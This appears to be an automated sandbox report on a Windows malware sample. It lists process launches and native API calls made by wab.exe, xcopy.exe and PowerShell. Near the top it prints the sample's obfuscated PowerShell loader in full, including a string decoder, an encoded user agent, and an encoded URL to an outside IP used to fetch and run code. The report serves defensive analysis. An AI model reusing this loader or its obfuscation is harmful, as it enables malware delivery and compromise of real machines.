';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_248835C0 NtCreateMutant,LdrInitializeThunk,17_2_248835C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_24882DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882B60 NtClose,LdrInitializeThunk,17_2_24882B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_24882C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882B80 NtQueryInformationFile,17_2_24882B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882E80 NtReadVirtualMemory,17_2_24882E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882F90 NtProtectVirtualMemory,17_2_24882F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24883090 NtSetValueKey,17_2_24883090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882BA0 NtEnumerateValueKey,17_2_24882BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882CA0 NtQueryInformationToken,17_2_24882CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882EA0 NtAdjustPrivilegesToken,17_2_24882EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882FA0 NtQuerySection,17_2_24882FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882AB0 NtWaitForSingleObject,17_2_24882AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882DB0 NtEnumerateKey,17_2_24882DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882FB0 NtResumeThread,17_2_24882FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_248839B0 NtGetContextThread,17_2_248839B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882CC0 NtQueryVirtualMemory,17_2_24882CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882AD0 NtReadFile,17_2_24882AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882DD0 NtDelayExecution,17_2_24882DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882BE0 NtQueryValueKey,17_2_24882BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882EE0 NtQueueApcThread,17_2_24882EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882FE0 NtCreateFile,17_2_24882FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882BF0 NtAllocateVirtualMemory,17_2_24882BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882AF0 NtWriteFile,17_2_24882AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882CF0 NtOpenProcess,17_2_24882CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882C00 NtQueryInformationProcess,17_2_24882C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882D00 NtSetInformationFile,17_2_24882D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882D10 NtMapViewOfSection,17_2_24882D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24883010 NtOpenDirectoryObject,17_2_24883010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24883D10 NtOpenProcessToken,17_2_24883D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882D30 NtUnmapViewOfSection,17_2_24882D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882E30 NtWriteVirtualMemory,17_2_24882E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882F30 NtCreateSection,17_2_24882F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24884340 NtSetContextThread,17_2_24884340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24884650 NtSuspendThread,17_2_24884650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882C60 NtCreateKey,17_2_24882C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24882F60 NtCreateProcessEx,17_2_24882F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24883D70 NtOpenThread,17_2_24883D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_075EE7D1 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,17_2_075EE7D1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03924340 NtSetContextThread,LdrInitializeThunk,22_2_03924340
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03923090 NtSetValueKey,LdrInitializeThunk,22_2_03923090
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03924650 NtSuspendThread,LdrInitializeThunk,22_2_03924650
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039235C0 NtCreateMutant,LdrInitializeThunk,22_2_039235C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,22_2_03922BA0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_03922BF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,22_2_03922BE0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922B60 NtClose,LdrInitializeThunk,22_2_03922B60
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922AD0 NtReadFile,LdrInitializeThunk,22_2_03922AD0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922AF0 NtWriteFile,LdrInitializeThunk,22_2_03922AF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039239B0 NtGetContextThread,LdrInitializeThunk,22_2_039239B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922FB0 NtResumeThread,LdrInitializeThunk,22_2_03922FB0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922FE0 NtCreateFile,LdrInitializeThunk,22_2_03922FE0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922F30 NtCreateSection,LdrInitializeThunk,22_2_03922F30
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,22_2_03922E80
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,22_2_03922EE0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922DD0 NtDelayExecution,LdrInitializeThunk,22_2_03922DD0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,22_2_03922DF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,22_2_03922D10
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,22_2_03922D30
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,22_2_03922CA0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,22_2_03922C70
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922C60 NtCreateKey,LdrInitializeThunk,22_2_03922C60
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03923010 NtOpenDirectoryObject,22_2_03923010
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922B80 NtQueryInformationFile,22_2_03922B80
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922AB0 NtWaitForSingleObject,22_2_03922AB0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922F90 NtProtectVirtualMemory,22_2_03922F90
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922FA0 NtQuerySection,22_2_03922FA0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922F60 NtCreateProcessEx,22_2_03922F60
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922EA0 NtAdjustPrivilegesToken,22_2_03922EA0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922E30 NtWriteVirtualMemory,22_2_03922E30
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922DB0 NtEnumerateKey,22_2_03922DB0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03923D10 NtOpenProcessToken,22_2_03923D10
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922D00 NtSetInformationFile,22_2_03922D00
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03923D70 NtOpenThread,22_2_03923D70
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922CC0 NtQueryVirtualMemory,22_2_03922CC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922CF0 NtOpenProcess,22_2_03922CF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922C00 NtQueryInformationProcess,22_2_03922C00
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57680 NtCreateFile,22_2_02F57680
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F577E0 NtReadFile,22_2_02F577E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57AC0 NtAllocateVirtualMemory,22_2_02F57AC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F578D0 NtDeleteFile,22_2_02F578D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57970 NtClose,22_2_02F57970
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348CD8928_2_00007FFD348CD892
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348CCAE68_2_00007FFD348CCAE6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C62388_2_00007FFD348C6238
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C26588_2_00007FFD348C2658
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C3BFB8_2_00007FFD348C3BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C53F08_2_00007FFD348C53F0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0845101011_2_08451010
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_084518E011_2_084518E0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08450CC811_2_08450CC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A17_3_08975E1A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A17_3_08975E1A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D3117_3_08975D31
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D3117_3_08975D31
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B3F17_3_08976B3F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B3F17_3_08976B3F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08973A3B17_3_08973A3B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08973A3B17_3_08973A3B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897432617_3_08974326
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897432617_3_08974326
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976ACF17_3_08976ACF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976ACF17_3_08976ACF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B4F17_3_08976B4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B4F17_3_08976B4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976C6F17_3_08976C6F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976ACF17_3_08976ACF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976CC017_3_08976CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976ACF17_3_08976ACF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976ACF17_3_08976ACF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A17_3_08975E1A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A17_3_08975E1A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08973A3B17_3_08973A3B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08973A3B17_3_08973A3B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976C6F17_3_08976C6F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D3117_3_08975D31
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D3117_3_08975D31
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B3F17_3_08976B3F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B3F17_3_08976B3F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897432617_3_08974326
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897432617_3_08974326
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B4F17_3_08976B4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08976B4F17_3_08976B4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24819B8017_2_24819B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24813FD217_2_24813FD2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24813FD517_2_24813FD5
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A615DB21_2_03A615DB
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A6338821_2_03A63388
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A6337F21_2_03A6337F
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A6162721_2_03A61627
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A6162821_2_03A61628
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A635A821_2_03A635A8
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A80D0821_2_03A80D08
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A69D0621_2_03A69D06
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeCode function: 21_2_03A69D0821_2_03A69D08
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0393739A22_2_0393739A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B03E622_2_039B03E6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F022_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A132D22_2_039A132D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD34C22_2_038DD34C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AA35222_2_039AA352
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A022_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C022_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399027422_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B01AA22_2_039B01AA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FB1B022_2_038FB1B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A81CC22_2_039A81CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A11822_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E010022_2_038E0100
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0397815822_2_03978158
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB16B22_2_039BB16B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0392516C22_2_0392516C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF17222_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C022_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F0CC22_2_0399F0CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A70E922_2_039A70E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AF0E022_2_039AF0E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AF7B022_2_039AF7B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EC7C022_2_038EC7C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391475022_2_03914750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F077022_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390C6E022_2_0390C6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B059122_2_039B0591
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398D5B022_2_0398D5B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F053522_2_038F0535
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A757122_2_039A7571
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399E4F622_2_0399E4F6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AF43F22_2_039AF43F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A244622_2_039A2446
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E146022_2_038E1460
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390FB8022_2_0390FB80
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A6BD722_2_039A6BD7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03965BF022_2_03965BF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0392DBF922_2_0392DBF9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AAB4022_2_039AAB40
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AFB7622_2_039AFB76
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EEA8022_2_038EEA80
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03935AA022_2_03935AA0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398DAAC22_2_0398DAAC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399DAC622_2_0399DAC6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AFA4922_2_039AFA49
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A7A4622_2_039A7A46
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03963A6C22_2_03963A6C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F29A022_2_038F29A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BA9A622_2_039BA9A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B95022_2_0390B950
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F995022_2_038F9950
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390696222_2_03906962
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D68B822_2_038D68B8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391E8F022_2_0391E8F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F38E022_2_038F38E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D80022_2_0395D800
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F284022_2_038F2840
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FA84022_2_038FA840
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1F9222_2_038F1F92
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AFFB122_2_039AFFB1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E2FC822_2_038E2FC8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FCFE022_2_038FCFE0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AFF0922_2_039AFF09
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03910F3022_2_03910F30
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03932F2822_2_03932F28
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03964F4022_2_03964F40
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03902E9022_2_03902E90
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039ACE9322_2_039ACE93
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F9EB022_2_038F9EB0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AEEDB22_2_039AEEDB
